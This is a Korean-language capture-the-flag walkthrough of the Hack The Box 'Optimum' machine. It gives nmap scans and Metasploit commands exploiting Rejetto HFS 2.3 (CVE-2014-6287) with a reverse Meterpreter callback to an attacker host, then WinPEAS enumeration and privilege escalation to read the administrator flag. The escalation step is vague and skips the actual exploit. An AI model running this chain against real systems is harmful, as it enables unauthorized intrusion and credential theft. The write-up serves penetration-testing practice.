
Hack The Box의 Optimum 머신에 대한 분석. 이 워크스루는 Rejetto HttpFileServer 2.3(CVE-2014-6287)의 악용을 통해 초기 액세스를 얻은 다음, 열거 기술과 사후 악용 도구를 사용하여 Windows 호스트에서 권한 상승을 수행하는 방법을 다룹니다.
이 머신의 목표는 취약한 웹 서비스를 악용하여 Windows 호스트에 대한 초기 접근을 획득한 다음, 권한을 상승시켜 관리자 플래그를 얻는 것입니다.
공격 경로는 다음과 같습니다:
노출된 서비스를 식별하기 위해 전체 TCP 포트 스캔으로 시작합니다.
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
스캔 결과 포트 80이 열려 있음을 확인합니다.
다음으로 서비스 및 버전 스캔을 수행합니다.
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
결과는 다음 서비스를 식별합니다:
HttpFileServer 2.3
이 서비스는 경량 파일 공유 웹 서버인 Rejetto HTTP File Server에 해당합니다.
감지된 버전을 조사한 후, 알려진 취약점을 발견합니다:
CVE-2014-6287
이 취약점은 부적절한 입력 검증으로 인해 원격 코드 실행을 허용합니다.
취약점을 악용하기 위해 Metasploit을 사용합니다.
Metasploit을 시작합니다:
msfconsole -q
적절한 모듈을 검색합니다:
search rejetto
익스플로잇 모듈을 로드합니다:
use exploit/windows/http/rejetto_hfs_exec
필요한 옵션을 구성합니다:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
실행되면 익스플로잇은 대상 머신에서 Meterpreter 세션을 제공합니다.
획득한 Meterpreter 세션을 통해 파일 시스템을 탐색하여 사용자 플래그를 획득합니다.
cd
cat user.txt
whoami
명령 출력은 우리가 다음 사용자로 로그인되어 있음을 보여줍니다:
kostas
이 사용자는 관리자 권한이 없으므로 권한 상승을 진행합니다.
잠재적인 권한 상승 벡터를 식별하기 위해 잘 알려진 Windows 권한 상승 열거 도구인 WinPEAS를 업로드합니다.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
그런 다음 실행합니다:
shell
.\wp.exe
출력은 사용자 kostas와 관련된 자격 증명을 포함한 유용한 정보를 보여줍니다.
가능한 상승 벡터를 검토한 후 Metasploit 모듈을 사용합니다:
local_exploit_suggester
모듈을 로드합니다:
use post/multi/recon/local_exploit_suggester
세션을 구성합니다:
set SESSION <SESSION_NUMBER>
run
이 모듈은 권한 상승에 사용할 수 있는 가능한 로컬 익스플로잇을 제안합니다.
권한 상승에 성공한 후 관리자 권한을 가진 셸을 획득합니다.
확인:
shell
whoami
관리자 권한을 획득한 후 루트 플래그를 획득하기 위해 Administrator 디렉터리로 이동합니다.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
이 머신은 몇 가지 중요한 침투 테스트 개념을 보여줍니다: